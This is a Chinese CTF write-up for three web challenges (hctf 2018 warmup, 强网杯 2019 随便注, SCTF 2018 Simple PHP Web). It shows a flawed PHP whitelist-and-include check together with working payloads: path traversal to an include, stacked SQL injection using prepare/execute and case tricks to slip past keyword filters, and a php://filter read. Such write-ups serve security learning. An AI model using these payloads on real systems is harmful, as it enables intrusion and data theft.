IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> bmzctf-web writeup -> 正文阅读

[PHP知识库]bmzctf-web writeup

hctf_2018_warmup

在这里插入图片描述

F12,有提示source.php:
在这里插入图片描述

Source.php是php代码,分析:

<?php
highlight_file(__FILE__);
class emmm
{
    public static function checkFile(&$page)
    {
        //两个白名单文件source.php和hint.php,source.php就是本文件。
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];

        //参数page必须存在并且是字符串格式
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }

        //如果page是白名单返回true
        if (in_array($page, $whitelist)) {
            return true;
        }

        /*
         * mb_strpos():返回要查找的字符串在别一个字符串中首次出现的位置。
         * 这里即:查找?在page中首次出现的位置。
         * mb_substr() 函数返回字符串的一部分。
         * 这里即:返回page字符串从第一个字符到首次出现的?之间的字符串。
         * */
        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );

        //如果page是白名单,返回true
        if (in_array($_page, $whitelist)) {
            return true;
        }

        //把page的值url解码
        $_page = urldecode($page);

        //同上
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        //同上
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}

//file参数必须是字符串,然后调用emmm类的checkFile方法,即过滤。
if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    //通过则把file包含。
    include $_REQUEST['file'];
    exit;
} else {
    //否则,输出滑稽脸
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
所以整个流程就是:过滤-白名单?-截断-白名单?-url解码-截断-白名单?如果能满足整个流程,就能得到flag。

看看另一个白名单hint.php。
在这里插入图片描述

给了flag文件的真实名称。考察点就是绕过几层过滤,包含flag文件进来。

思路就是:要过白名单,payload里面肯定要有source.php或hint.php。要过截断payload里就要有?,而且?前面是白名单,这样截断之后,还能过白名单。所以目前payload:?file=hint.php?,那么可操作的就是后面了,前面就是这样定了。后面应该是flag的路径,flag的路径在根/flaaagg,可以多加几层…/。
最终payload:?file=hint.php?../…/…/…/…/…/flaaagg
在这里插入图片描述

这个php代码存在问题在哪里呢?在于返回值是true或false,而不是经过过滤后的值。应该把过滤后的值返回,再进行包含。

强网杯 2019 随便注

老题了,考察堆叠注入。
Payload:-1’;show databases#
在这里插入图片描述

白名单:/select|update|delete|drop|insert|where|
在这里插入图片描述

查表:-1’;show tables;
在这里插入图片描述

两个表,一个flagg,一个words。
查询flagg表的字段:-1’;show columns from flagg;
在这里插入图片描述

应该就是这个flag字段了,查值需要到select关键词:select * from flagg;,但是select被黑名单了不能用。
可以使用预编译的方法:-1’;set @sql = concat(‘se’,‘lect * from flagg;’);prepare exe from @sql;execute exe;
Set用于声明一个变量@sql,值为concat(‘se’,‘lect * from flagg;’);,prepare是预备语句,以备后面用,execute就是执行了。
在这里插入图片描述

结果被strstr函数检测到了,strstr是检测关键词在字符串中首次出现的位置,并返回关键词及其剩余的部分。
大小写可以绕过这个函数。因为它是大小写敏感匹配的。
所以payload:-1’;Set @sql = concat(‘se’,‘lect * from flagg;’);Prepare exe from @sql;execute exe;
在这里插入图片描述

SCTF 2018_Simple PHP Web

F参数有文件包含漏洞,但是不能直接包含,应该是禁用了那些常用包含函数。但是可以用伪函数:php://filter/read=convert.base64-encode/resource=/flag

在这里插入图片描述
在这里插入图片描述

而且这里,flag就直接是/flag,没在文件名这里为难。
在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-02-24 15:04:36  更:2022-02-24 15:05:31 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/26 16:20:09-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计